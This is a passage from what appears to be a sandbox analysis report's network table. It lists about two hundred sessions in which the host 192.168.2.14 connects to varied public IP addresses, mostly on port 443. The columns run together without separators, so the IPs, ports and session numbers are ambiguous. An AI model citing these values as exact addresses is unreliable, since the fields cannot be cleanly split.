                                                      15359192.168.2.1459092140.23.193.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15360192.168.2.144747065.16.180.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15361192.168.2.144363875.71.136.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15362192.168.2.1443394152.120.50.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15363192.168.2.143913623.143.140.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15364192.168.2.1436548163.123.134.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15365192.168.2.143774065.171.52.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15366192.168.2.1440850126.192.34.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15367192.168.2.145311614.152.253.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15368192.168.2.1459472194.254.177.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15369192.168.2.1439616145.226.7.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15370192.168.2.144125848.162.26.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15371192.168.2.14512868.249.95.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15372192.168.2.1450922213.87.32.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15373192.168.2.14349488.252.100.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15374192.168.2.144548466.238.11.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15375192.168.2.145697283.9.114.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15376192.168.2.143341664.23.131.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15377192.168.2.1459030115.210.32.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15378192.168.2.1447044181.66.209.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15379192.168.2.1435124128.86.199.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15380192.168.2.1439360155.129.84.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15381192.168.2.1455442205.246.39.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15382192.168.2.1459730180.231.0.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15383192.168.2.144624049.165.61.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15384192.168.2.1451936110.211.59.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15385192.168.2.144461242.164.148.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15386192.168.2.1459156160.13.26.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15387192.168.2.144148657.230.122.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15388192.168.2.1443756102.115.255.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15389192.168.2.1454136125.179.100.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15390192.168.2.1452586217.59.155.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15391192.168.2.1460256138.44.10.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15392192.168.2.143292619.192.138.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15393192.168.2.1449798216.198.185.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15394192.168.2.1434384195.243.60.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15395192.168.2.1449084219.45.78.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15396192.168.2.144496289.218.23.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15397192.168.2.1444902155.73.92.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15398192.168.2.1450178125.159.108.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15399192.168.2.145910491.153.160.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15400192.168.2.1459824144.81.77.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15401192.168.2.1440622196.232.180.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15402192.168.2.1438600131.150.10.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15403192.168.2.1434498160.79.115.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15404192.168.2.144602482.61.195.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15405192.168.2.1445326203.216.28.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15406192.168.2.1440214104.255.226.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15407192.168.2.1457228198.217.191.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15408192.168.2.1441866156.60.71.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15409192.168.2.1457540191.149.216.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15410192.168.2.1438626165.12.134.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15411192.168.2.1452350206.85.116.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15412192.168.2.1436998142.93.157.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15413192.168.2.145145676.83.162.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15414192.168.2.1447726112.84.30.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15415192.168.2.144016439.10.164.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15416192.168.2.1442190176.211.244.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15417192.168.2.143905653.26.26.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15418192.168.2.1456342137.116.242.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15419192.168.2.144744238.38.25.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15420192.168.2.1436512221.71.52.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15421192.168.2.145796893.221.61.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15422192.168.2.14579105.192.3.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15423192.168.2.1433428169.123.49.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15424192.168.2.145265493.181.0.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15425192.168.2.143836893.76.140.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15426192.168.2.1440530172.202.145.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15427192.168.2.1432792123.171.34.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15428192.168.2.145425095.211.30.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15429192.168.2.1438274119.244.86.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15430192.168.2.1447706135.20.132.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15431192.168.2.1437208111.236.145.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15432192.168.2.144078692.85.4.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15433192.168.2.144852450.210.199.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15434192.168.2.1436734208.63.149.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15435192.168.2.144104496.174.205.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15436192.168.2.1446094190.200.126.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15437192.168.2.145750666.229.107.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15438192.168.2.1453594117.241.208.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15439192.168.2.144319841.196.180.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15440192.168.2.1440302210.135.43.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15441192.168.2.1438868170.33.80.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15442192.168.2.1457918134.129.98.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15443192.168.2.1458844186.53.149.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15444192.168.2.144550865.158.36.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15445192.168.2.145156836.192.175.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15446192.168.2.1437344190.163.252.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15447192.168.2.1432964195.166.190.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15448192.168.2.1433018157.82.88.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15449192.168.2.1440714132.227.83.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15450192.168.2.1445476213.16.190.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15451192.168.2.1434708158.118.230.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15452192.168.2.145855265.153.123.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15453192.168.2.1455578174.80.129.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15454192.168.2.1433078149.222.80.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15455192.168.2.145088423.44.53.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15456192.168.2.144780857.142.239.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15457192.168.2.144128659.196.134.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15458192.168.2.1445220138.106.224.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15459192.168.2.1452852156.204.9.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15460192.168.2.1444272176.25.241.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15461192.168.2.1452578109.46.49.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15462192.168.2.1453184178.55.71.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15463192.168.2.1433564218.241.177.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15464192.168.2.1448252142.135.45.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15465192.168.2.1432850161.220.77.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15466192.168.2.1439694210.146.10.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15467192.168.2.145992891.19.217.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15468192.168.2.1446786156.238.15.718080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15469192.168.2.1444260205.176.209.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15470192.168.2.1442006106.117.111.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15471192.168.2.145908214.140.6.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15472192.168.2.144860442.50.26.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15473192.168.2.144675091.35.103.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15474192.168.2.1448280144.34.233.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15475192.168.2.1451510179.186.51.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15476192.168.2.1452480167.171.27.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15477192.168.2.144320290.167.24.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15478192.168.2.144066837.255.157.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15479192.168.2.1456344109.14.14.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15480192.168.2.146020037.254.130.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15481192.168.2.1448204104.12.165.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15482192.168.2.1457520162.186.97.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15483192.168.2.146003297.14.163.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15484192.168.2.1451632100.17.103.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15485192.168.2.1456380148.113.150.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15486192.168.2.1456338142.187.137.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15487192.168.2.1435490199.45.71.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15488192.168.2.1447086179.95.117.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15489192.168.2.14501145.27.25.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15490192.168.2.144380086.156.181.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15491192.168.2.1450264109.20.141.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15492192.168.2.144733245.139.142.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15493192.168.2.143858645.62.206.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15494192.168.2.1456678116.76.106.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15495192.168.2.1458790142.120.206.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15496192.168.2.145473227.155.100.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15497192.168.2.1460950193.128.127.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15498192.168.2.145638844.38.151.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15499192.168.2.1458786122.58.193.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15500192.168.2.1453474192.14.0.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15501192.168.2.1452554189.175.196.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15502192.168.2.1443384148.181.54.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15503192.168.2.145678436.105.207.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15504192.168.2.1454274131.84.184.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15505192.168.2.146052877.52.236.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15506192.168.2.1442586107.175.184.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15507192.168.2.1434108140.143.61.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15508192.168.2.1447746195.56.182.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15509192.168.2.1457574179.253.147.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15510192.168.2.146050695.221.89.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15511192.168.2.1437862174.10.75.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15512192.168.2.143798014.186.219.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15513192.168.2.1449952207.236.22.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15514192.168.2.145329436.3.174.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15515192.168.2.1448970194.174.113.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15516192.168.2.1432896104.230.196.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15517192.168.2.1444328166.24.17.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15518192.168.2.1455862134.38.177.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15519192.168.2.1439804160.8.221.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15520192.168.2.143485824.173.129.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15521192.168.2.1459568205.195.69.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15522192.168.2.1434078212.222.199.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15523192.168.2.144092832.100.73.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15524192.168.2.1432800200.69.156.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15525192.168.2.144683839.90.81.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15526192.168.2.1450734110.75.17.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15527192.168.2.1440846108.220.228.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15528192.168.2.1441834163.38.236.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15529192.168.2.143752487.231.181.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15530192.168.2.1455196210.133.27.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15531192.168.2.1450912155.18.144.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15532192.168.2.1433028207.112.93.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15533192.168.2.1459240206.171.47.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15534192.168.2.145892241.220.166.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15535192.168.2.1436010128.231.105.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15536192.168.2.1452018137.141.40.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15537192.168.2.144504648.241.18.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15538192.168.2.1460040172.196.157.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15539192.168.2.143550271.91.82.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15540192.168.2.1449636206.231.82.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15541192.168.2.1449682140.139.95.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15542192.168.2.144377246.229.191.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15543192.168.2.1444028158.202.165.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15544192.168.2.1443988120.244.69.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15545192.168.2.1458340119.169.253.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15546192.168.2.145449273.24.95.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15547192.168.2.1440304122.39.112.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15548192.168.2.1446860169.66.44.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15549192.168.2.1435426149.205.38.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15550192.168.2.144379653.90.255.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15551192.168.2.1436406101.90.138.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15552192.168.2.145845853.40.33.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15553192.168.2.144618073.30.224.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15554192.168.2.143276847.11.140.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15555192.168.2.1459418154.68.241.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15556192.168.2.1458786148.77.2.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15557192.168.2.1438582137.39.113.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15558192.168.2.1446362138.136.215.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15559192.168.2.1457696116.240.215.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15560192.168.2.145787646.109.169.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15561192.168.2.1451384149.118.46.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15562192.168.2.1443268191.72.131.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15563192.168.2.144629066.250.240.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15564192.168.2.14601465.147.37.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15565192.168.2.145377857.6.2.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15566192.168.2.1437918184.236.10.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15567192.168.2.1445002188.63.238.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15568192.168.2.145493014.242.144.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15569192.168.2.145244460.135.90.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15570192.168.2.143669817.153.252.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15571192.168.2.1460500160.154.202.175443
